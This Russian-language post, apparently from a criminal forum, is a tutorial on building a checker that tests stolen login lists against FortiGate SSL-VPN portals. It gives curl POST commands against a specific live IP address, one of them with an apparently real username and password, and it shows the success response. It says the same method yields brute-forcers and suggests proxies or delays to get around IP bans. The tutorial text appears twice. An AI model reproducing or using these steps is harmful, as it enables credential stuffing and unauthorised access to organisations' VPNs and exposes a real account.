Вижу арбитражи, ной и вой о платных чекрерах логов, аренде и прочем, в связи с этим хочу разобрать тему написания таких чекеров.
В качестве примера возьму заезженный FortiGate SSL-VPN
Для того чтобы написать "чекер валида" на какой то продукт\сервис\форму_входа, нужно узнать как будут проверяться учетки.
Точнее где, для наглядности можно запустить бурп и посмотреть в каком виде, в каких параметрах и куда передаются данные которые вы вводите в сервис.
В ниже показаных параметрах мы видим значения (заведомо не валидные), и видим куда они передались.
Увидели, теперь мы знаем из чего собрать наш request на проверку валида, попробуем отправить те же данные с помощью curl:
-s, --silent - Silent mode
-k, --insecure - flag to skip certificate validation
-d, --data <data> - HTTP POST data
-X, --request - This flag will used to send custom request to the server.
Ага, отвечает что не хватает нам значит пермишенсов, ну то что отвечает уже здорово значит контакт есть.
Теперь отправим валидные данные:
Проверим также в бурпе
И что мы видим, валид! Засунусть теперь этот запрос в цикл в вашем любимом языке программирования(или заплатить кодеру) и подать ему на вход список ваших логов, и вот он ваш чекер.
Также можно клепать и к другим сервисам, да где то нужно будет чуть подумать, но принцип тот же. Онлайн, Бесплатно и Без регистрации.
Таким же образом можно писать бруты.
Конечно на сервисах могут быть защиты, по типу бана акка или ip на время, но это уже решается так как вы придумаете обход.
В примере с фортиками, то он банит ip на 15 минут, можно использовать прокси, или написать задержку в чекере, или что то другое, зависит от вашего воображения
В качестве примера возьму заезженный FortiGate SSL-VPN
Для того чтобы написать "чекер валида" на какой то продукт\сервис\форму_входа, нужно узнать как будут проверяться учетки.
Точнее где, для наглядности можно запустить бурп и посмотреть в каком виде, в каких параметрах и куда передаются данные которые вы вводите в сервис.
В ниже показаных параметрах мы видим значения (заведомо не валидные), и видим куда они передались.
Увидели, теперь мы знаем из чего собрать наш request на проверку валида, попробуем отправить те же данные с помощью curl:
curl -s -k -d "ajax=1&username=hello&credential=hello" -X POST https://24.236.149.142/remote/logincheck-s, --silent - Silent mode
-k, --insecure - flag to skip certificate validation
-d, --data <data> - HTTP POST data
-X, --request - This flag will used to send custom request to the server.
ret=0,redir=/remote/login?&err=[COLOR=rgb(226, 80, 65)]sslvpn_login_permission_denied[/COLOR]&lang=enАга, отвечает что не хватает нам значит пермишенсов, ну то что отвечает уже здорово значит контакт есть.
Теперь отправим валидные данные:
curl -s -k -d "ajax=1&username=nettech&credential=@vpn4BrickYard" -X POST https://24.236.149.142/remote/logincheckret=1,redir=/remote/hostcheck_install?auth_type=1&user=6E657474656368&&grpname=56504E5573657247726F7570&portal=66756C6C2D616363657373&&rip=185.243.218.61&realm=Проверим также в бурпе
И что мы видим, валид! Засунусть теперь этот запрос в цикл в вашем любимом языке программирования(или заплатить кодеру) и подать ему на вход список ваших логов, и вот он ваш чекер.
Также можно клепать и к другим сервисам, да где то нужно будет чуть подумать, но принцип тот же. Онлайн, Бесплатно и Без регистрации.
Таким же образом можно писать бруты.
Конечно на сервисах могут быть защиты, по типу бана акка или ip на время, но это уже решается так как вы придумаете обход.
В примере с фортиками, то он банит ip на 15 минут, можно использовать прокси, или написать задержку в чекере, или что то другое, зависит от вашего воображения